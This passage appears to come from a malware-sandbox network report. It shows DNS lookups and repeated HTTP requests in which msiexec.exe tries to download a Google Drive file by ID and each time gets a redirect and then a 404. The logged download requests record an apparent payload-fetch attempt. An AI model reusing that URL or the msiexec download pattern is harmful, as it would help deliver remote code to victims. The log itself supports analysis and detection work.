                                                              Jan 11, 2025 00:02:54.640440941 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:54.640620947 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:54.641258001 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:54.641273975 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:54.641467094 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:54.641474962 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.067301035 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.067374945 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.067399025 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:55.067439079 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.067455053 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.067456007 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:55.067477942 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:55.067500114 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:55.068226099 CET49764443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:55.068244934 CET44349764172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:55.191888094 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.191946983 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:55.192054033 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.192512035 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.192533016 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:55.818336964 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:55.818412066 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.822279930 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.822300911 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:55.822812080 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:55.822822094 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:56.219402075 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:56.219492912 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:56.219521999 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:56.219568014 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:56.219707966 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:56.219743013 CET44349765216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:56.219789028 CET49765443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:56.227678061 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.227736950 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:56.227809906 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.228152037 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.228168011 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:56.864942074 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:56.865034103 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.865765095 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.865781069 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:56.865945101 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:56.865951061 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:57.311928034 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:57.312000990 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:57.312024117 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:57.312067032 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:57.312081099 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:57.312110901 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:57.312987089 CET49766443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:57.313044071 CET44349766172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:57.428765059 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:57.428831100 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:57.428904057 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:57.429409027 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:57.429423094 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.144824028 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.145004034 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.145600080 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.145668983 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.160790920 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.160821915 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.161287069 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.161698103 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.162142992 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.207330942 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.523829937 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.523921013 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.523947001 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.523963928 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.523998022 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.524920940 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.524946928 CET44349767216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:58.524971008 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.524991035 CET49767443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:58.570343018 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:58.570410967 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:58.570611954 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:58.571064949 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:58.571084023 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.203572989 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.203701973 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.204205990 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.204221964 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.204387903 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.204396963 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.634397030 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.634566069 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.634689093 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.634728909 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.634752035 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.634784937 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.634784937 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.634812117 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.635610104 CET49768443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:02:59.635632038 CET44349768172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:02:59.754533052 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:59.754580021 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:02:59.754663944 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:59.755018950 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:02:59.755028963 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.407777071 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.407861948 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.408365011 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.408391953 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.408581018 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.408592939 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.794066906 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.794284105 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.794297934 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.794338942 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.794389009 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.794416904 CET44349769216.58.206.46192.168.2.8
                                                              Jan 11, 2025 00:03:00.794460058 CET49769443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:00.801073074 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:00.801125050 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:00.801212072 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:00.801422119 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:00.801440001 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.429455042 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.429522038 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.439059973 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.439074039 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.439243078 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.439249039 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858577967 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858726025 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.858741045 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858772039 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858803988 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.858840942 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.858855963 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858899117 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.858932018 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.858977079 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.859637976 CET49770443192.168.2.8172.217.16.193
                                                              Jan 11, 2025 00:03:01.859663010 CET44349770172.217.16.193192.168.2.8
                                                              Jan 11, 2025 00:03:01.973582029 CET49771443192.168.2.8216.58.206.46
                                                              Jan 11, 2025 00:03:01.973642111 CET44349771216.58.206.46192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 00:01:50.174949884 CET | 65396 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 00:01:50.181960106 CET | 53 | 65396 | 1.1.1.1 | 192.168.2.8
Jan 11, 2025 00:01:51.284293890 CET | 64588 | 53 | 192.168.2.8 | 1.1.1.1
Jan 11, 2025 00:01:51.291687965 CET | 53 | 64588 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 00:01:50.174949884 CET | 192.168.2.8 | 1.1.1.1 | 0x3751 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 00:01:51.284293890 CET | 192.168.2.8 | 1.1.1.1 | 0x469c | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 00:01:50.181960106 CET | 1.1.1.1 | 192.168.2.8 | 0x3751 | No error (0) | drive.google.com |  | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 00:01:51.291687965 CET | 1.1.1.1 | 192.168.2.8 | 0x469c | No error (0) | drive.usercontent.google.com |  | 172.217.16.193 | A (IP address) | IN (0x0001) | false

                                                              • drive.google.com
                                                              • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:50 UTC | 216 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
2025-01-10 23:01:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:51 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-YUxa4BKgMQvmGQ4-jl0QhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:51 UTC | 258 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
2025-01-10 23:01:52 UTC | 2219 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQ2rQlINRCcUrcm12Z2EJjQL-kWl05VX5QWdGnN-xgU3naMid1RB4AZLUIEv6dEskZF
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:52 GMT
                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5JFBfqfOh-lh1z2P86CmbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Set-Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz; expires=Sat, 12-Jul-2025 23:01:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
2025-01-10 23:01:52 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VWWPuiSkbH_yEeyaclfwuw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:53 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
2025-01-10 23:01:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:53 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-XuFM9vMeM4fo_t-Wtt5UfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:54 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
2025-01-10 23:01:54 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSloQ9RxKEPo9SzUbDBRPO4H9dzZ5jz4K-fyghXAw8HwyuyzCFupqva2xA9587GAb5nBnw3mPM
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:54 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-cJU_FO-jrWcL_qZyu1R88g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
2025-01-10 23:01:54 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y6xGPTHR8weaH0DaJu_nrA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49712 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:55 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
2025-01-10 23:01:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:55 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-iTji9RJujhrRmpTSdtTn_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
